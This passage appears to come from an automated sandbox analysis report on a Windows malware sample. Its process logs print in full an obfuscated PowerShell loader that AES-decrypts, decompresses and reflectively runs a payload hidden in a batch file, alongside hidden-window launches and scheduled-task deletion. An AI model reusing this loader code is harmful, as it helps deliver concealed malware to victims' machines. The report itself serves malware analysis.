'$QmRKw=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IvNNq=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($KSWxg, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IvNNq.CopyTo($QmRKw); $IvNNq.Dispose(); $KSWxg.Dispose(); $QmRKw.Dispose(); $QmRKw.ToArray();}function bKLzO($qgBgH,$HpAZd){ Invoke-Expression '$Koibj=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$qgBgH);'.Replace('blck', ''); Invoke-Expression '$eMXWr=$Koibj.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$eMXWr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $HpAZd)blck;'.Replace('blck', '');}$DgVFr = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $DgVFr;$BZwPR=[System.IO.File]::ReadAllText($DgVFr).Split([Environment]::NewLine);foreach ($BpbHj in $BZwPR) { if ($BpbHj.StartsWith(':: ')) { $syTFV=$BpbHj.Substring(3); break; }}$eWOHt=[string[]]$syTFV.Split('\');Invoke-Expression '$fHjin=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[0])));'.Replace('blck', '');Invoke-Expression '$gCnqy=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[1])));'.Replace('blck', '');bKLzO $fHjin (,[string[]] (''));bKLzO $gCnqy (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{efb95082-f278-4e03-9e3f-6389e31f9866}

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function pnnxp($qgbgh){ $eocgk=[system.security.cryptography.aes]::create(); $eocgk.mode=[system.security.cryptography.ciphermode]::cbc; $eocgk.padding=[system.security.cryptography.paddingmode]::pkcs7; $eocgk.key=[system.convert]::frombase64string('y9z5o9ck+dhycwqkzoy/iwepx+o8iv9a3dgjbxpgjzk='); $eocgk.iv=[system.convert]::frombase64string('6xsbrvuro9xqg710dey/2a=='); $hrolg=$eocgk.createdecryptor(); $iczib=$hrolg.transformfinalblock($qgbgh, 0, $qgbgh.length); $hrolg.dispose(); $eocgk.dispose(); $iczib;}function yvagc($qgbgh){ invoke-expression '$kswxg=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$qgbgh);'.replace('blck', ''); invoke-expression '$qmrkw=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$ivnnq=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($kswxg, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $ivnnq.copyto($qmrkw); $ivnnq.dispose(); $kswxg.dispose(); $qmrkw.dispose(); $qmrkw.toarray();}function bklzo($qgbgh,$hpazd){ invoke-expression '$koibj=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$qgbgh);'.replace('blck', ''); invoke-expression '$emxwr=$koibj.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$emxwr.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $hpazd)blck;'.replace('blck', '');}$dgvfr = 'c:\users\user\desktop\1 (2).cmd';$host.ui.rawui.windowtitle = $dgvfr;$bzwpr=[system.io.file]::readalltext($dgvfr).split([environment]::newline);foreach ($bpbhj in $bzwpr) { if ($bpbhj.startswith(':: ')) { $sytfv=$bpbhj.substring(3); break; }}$ewoht=[string[]]$sytfv.split('\');invoke-expression '$fhjin=yvagc (pnnxp (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ewoht[0])));'.replace('blck', '');invoke-expression '$gcnqy=yvagc (pnnxp (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ewoht[1])));'.replace('blck', '');bklzo $fhjin (,[string[]] (''));bklzo $gcnqy (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function pnnxp($qgbgh){ $eocgk=[system.security.cryptography.aes]::create(); $eocgk.mode=[system.security.cryptography.ciphermode]::cbc; $eocgk.padding=[system.security.cryptography.paddingmode]::pkcs7; $eocgk.key=[system.convert]::frombase64string('y9z5o9ck+dhycwqkzoy/iwepx+o8iv9a3dgjbxpgjzk='); $eocgk.iv=[system.convert]::frombase64string('6xsbrvuro9xqg710dey/2a=='); $hrolg=$eocgk.createdecryptor(); $iczib=$hrolg.transformfinalblock($qgbgh, 0, $qgbgh.length); $hrolg.dispose(); $eocgk.dispose(); $iczib;}function yvagc($qgbgh){ invoke-expression '$kswxg=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$qgbgh);'.replace('blck', ''); invoke-expression '$qmrkw=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$ivnnq=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($kswxg, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $ivnnq.copyto($qmrkw); $ivnnq.dispose(); $kswxg.dispose(); $qmrkw.dispose(); $qmrkw.toarray();}function bklzo($qgbgh,$hpazd){ invoke-expression '$koibj=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$qgbgh);'.replace('blck', ''); invoke-expression '$emxwr=$koibj.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$emxwr.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $hpazd)blck;'.replace('blck', '');}$dgvfr = 'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $dgvfr;$bzwpr=[system.io.file]::readalltext($dgvfr).split([environment]::newline);foreach ($bpbhj in $bzwpr) { if ($bpbhj.startswith(':: ')) { $sytfv=$bpbhj.substring(3); break; }}$ewoht=[string[]]$sytfv.split('\');invoke-expression '$fhjin=yvagc (pnnxp (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ewoht[0])));'.replace('blck', '');invoke-expression '$gcnqy=yvagc (pnnxp (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ewoht[1])));'.replace('blck', '');bklzo $fhjin (,[string[]] (''));bklzo $gcnqy (,[string[]] (''));
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:aywzgkditfai{param([outputtype([type])][parameter(position=0)][type[]]$fjpxtsrgmukcyl,[parameter(position=1)][type]$dkfbmaokcb)$quflgqkjgbw=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname(''+[char](82)+''+[char](101)+''+'f'+''+[char](108)+''+[char](101)+'c'+[char](116)+''+'e'+''+[char](100)+''+'d'+''+[char](101)+''+[char](108)+''+[char](101)+''+[char](103)+'ate')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule('i'+[char](110)+''+'m'+''+[char](101)+''+'m'+'o'+[char](114)+''+[char](121)+''+[char](77)+''+'o'+''+[char](100)+''+[char](117)+'l'+'e'+'',$false).definetype('m'+[char](121)+'de'+[char](108)+'eg'+'a'+''+[char](116)+''+[char](101)+''+[char](84)+''+'y'+''+[char](112)+''+[char](101)+'',''+[char](67)+''+[char](108)+''+[char](97)+''+[char](115)+''+'s'+''+[char](44)+''+[char](80)+'ub'+[char](108)+''+'i'+''+[char](99)+''+','+''+'s'+''+'e'+'a'+[char](108)+'e'+[char](100)+''+','+''+[char](65)+''+[char](110)+''+[char](115)+'i'+'c'+''+[char](108)+''+[char](97)+''+[char](115)+''+'s'+','+[char](65)+''+[char](117)+''+[char](116)+''+[char](111)+''+'c'+''+[char](108)+''+[char](97)+''+[char](115)+''+[char](115)+'',[multicastdelegate]);$quflgqkjgbw.defineconstructor(''+[char](82)+'t'+'s'+''+[char](112)+''+'e'+''+[char](99)+''+[char](105)+''+[char](97)+''+'l'+''+[char](78)+''+[char](97)+''+'m'+''+[char](101)+','+'h'+''+'i'+''+'d'+''+[char](101)+''+'b'+''+[char](121)+''+[char](83)+''+[char](105)+''+[char](103)+''+[char](44)+''+'p'+'u'+[char](98)+''+[char](108)+''+[char](105)+''+[char](99)+'',[reflection.callingconventions]::standard,$fjpxtsrgmukcyl).setimplementationflags(''+'r'+'u'+'n'+''+'t'+''+[char](105)+''+'m'+''+[char](101)+''+','+''+[char](77)+''+[char](97)+''+[char](110)+''+[char](97)+'g'+[char](101)+''+[char](100)+'');$quflgqkjgbw.definemethod(''+[char](73)+''+[char](110)+''+[char](118)+''+'o'+''+[char](107)+''+[char](101)+'','p'+[char](117)+''+[char](98)+''+[char](108)+''+[char](105)+'c'+[char](44)+''+[char](72)+'i'+[char](100)+''+[char](101)+''+'b'+''+[char](121)+''+[char](83)+'i'+[char](103)+''+[char](44)+'n'+[char](101)+''+'w'+'s'+[char](108)+''+[char](111)+''+'t'+''+[char](44)+'v'+[char](105)+''+'r'+''+[char](116)+''+[char](117)+'a'+[char](108)+'',$dkfbmaokcb,$fjpxtsrgmukcyl).setimplementationflags(''+[char](82)+''+[char](117)+''+[char](110)+''+[char](116)+''+'i'+'m'+[char](101)+''+','+''+'m'+''+[char](97)+''+'n'+''+'a'+'g'+[char](101)+'d');write-output $quflgqkjgbw.createtype();}$wrnqvvfrvlsrh=([appdomain]::currentdomain.getassemblies()\|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals('s'+[char](121)+''+[char](115)+'tem'+[char](46)+''+[char](100)+''+[char](108)+'l')}).gettype(''+'m'+''+[char](105)+''+'c'+''+[char](114)+''+[char](111)+''+'s'+''+'o'+''+[char](102)+''+[char](116)+''+'.'+'w'+'i'+''+[char](110)+''+[char](51)+''+[char](50)+''
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function pnnxp($qgbgh){ $eocgk=[system.security.cryptography.aes]::create(); $eocgk.mode=[system.security.cryptography.ciphermode]::cbc; $eocgk.padding=[system.security.cryptography.paddingmode]::pkcs7; $eocgk.key=[system.convert]::frombase64string('y9z5o9ck+dhycwqkzoy/iwepx+o8iv9a3dgjbxpgjzk='); $eocgk.iv=[system.convert]::frombase64string('6xsbrvuro9xqg710dey/2a=='); $hrolg=$eocgk.createdecryptor(); $iczib=$hrolg.transformfinalblock($qgbgh, 0, $qgbgh.length); $hrolg.dispose(); $eocgk.dispose(); $iczib;}function yvagc($qgbgh){ invoke-expression '$kswxg=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$qgbgh);'.replace('blck', ''); invoke-expression '$qmrkw=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$ivnnq=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($kswxg, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $ivnnq.copyto($qmrkw); $ivnnq.dispose(); $kswxg.dispose(); $qmrkw.dispose(); $qmrkw.toarray();}function bklzo($qgbgh,$hpazd){ invoke-expression '$koibj=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$qgbgh);'.replace('blck', ''); invoke-expression '$emxwr=$koibj.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$emxwr.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $hpazd)blck;'.replace('blck', '');}$dgvfr = 'c:\users\user\desktop\1 (2).cmd';$host.ui.rawui.windowtitle = $dgvfr;$bzwpr=[system.io.file]::readalltext($dgvfr).split([environment]::newline);foreach ($bpbhj in $bzwpr) { if ($bpbhj.startswith(':: ')) { $sytfv=$bpbhj.substring(3); break; }}$ewoht=[string[]]$sytfv.split('\');invoke-expression '$fhjin=yvagc (pnnxp (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ewoht[0])));'.replace('blck', '');invoke-expression '$gcnqy=yvagc (pnnxp (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ewoht[1])));'.replace('blck', '');bklzo $fhjin (,[string[]] (''));bklzo $gcnqy (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function pnnxp($qgbgh){ $eocgk=[system.security.cryptography.aes]::create(); $eocgk.mode=[system.security.cryptography.ciphermode]::cbc; $eocgk.padding=[system.security.cryptography.paddingmode]::pkcs7; $eocgk.key=[system.convert]::frombase64string('y9z5o9ck+dhycwqkzoy/iwepx+o8iv9a3dgjbxpgjzk='); $eocgk.iv=[system.convert]::frombase64string('6xsbrvuro9xqg710dey/2a=='); $hrolg=$eocgk.createdecryptor(); $iczib=$hrolg.transformfinalblock($qgbgh, 0, $qgbgh.length); $hrolg.dispose(); $eocgk.dispose(); $iczib;}function yvagc($qgbgh){ invoke-expression '$kswxg=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$qgbgh);'.replace('blck', ''); invoke-expression '$qmrkw=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$ivnnq=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($kswxg, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $ivnnq.copyto($qmrkw); $ivnnq.dispose(); $kswxg.dispose(); $qmrkw.dispose(); $qmrkw.toarray();}function bklzo($qgbgh,$hpazd){ invoke-expression '$koibj=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$qgbgh);'.replace('blck', ''); invoke-expression '$emxwr=$koibj.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$emxwr.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $hpazd)blck;'.replace('blck', '');}$dgvfr = 'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $dgvfr;$bzwpr=[system.io.file]::readalltext($dgvfr).split([environment]::newline);foreach ($bpbhj in $bzwpr) { if ($bpbhj.startswith(':: ')) { $sytfv=$bpbhj.substring(3); break; }}$ewoht=[string[]]$sytfv.split('\');invoke-expression '$fhjin=yvagc (pnnxp (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ewoht[0])));'.replace('blck', '');invoke-expression '$gcnqy=yvagc (pnnxp (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ewoht[1])));'.replace('blck', '');bklzo $fhjin (,[string[]] (''));bklzo $gcnqy (,[string[]] (''));	Jump to behavior

Source: C:\Windows\System32\dllhost.exe

Code function: 40_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

40_2_0000000140002300

Source: C:\Windows\System32\dllhost.exe

Code function: 40_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

40_2_0000000140002300

Source: conhost.exe, 00000014.00000002.2696004459.000001B443481000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001C.00000002.2729808580.000001B796221000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000029.00000002.2727586047.000002E991B71000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: conhost.exe, 00000014.00000002.2696004459.000001B443481000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001C.00000002.2729808580.000001B796221000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000029.00000002.2727586047.000002E991B71000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: conhost.exe, 00000014.00000002.2696004459.000001B443481000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001C.00000002.2729808580.000001B796221000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000029.00000002.2727586047.000002E991B71000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: 0Program Manager
Source: conhost.exe, 00000014.00000002.2696004459.000001B443481000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001C.00000002.2729808580.000001B796221000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000029.00000002.2727586047.000002E991B71000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\conhost.exe

Code function: 20_3_000001B4448B2AF0 cpuid

20_3_000001B4448B2AF0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
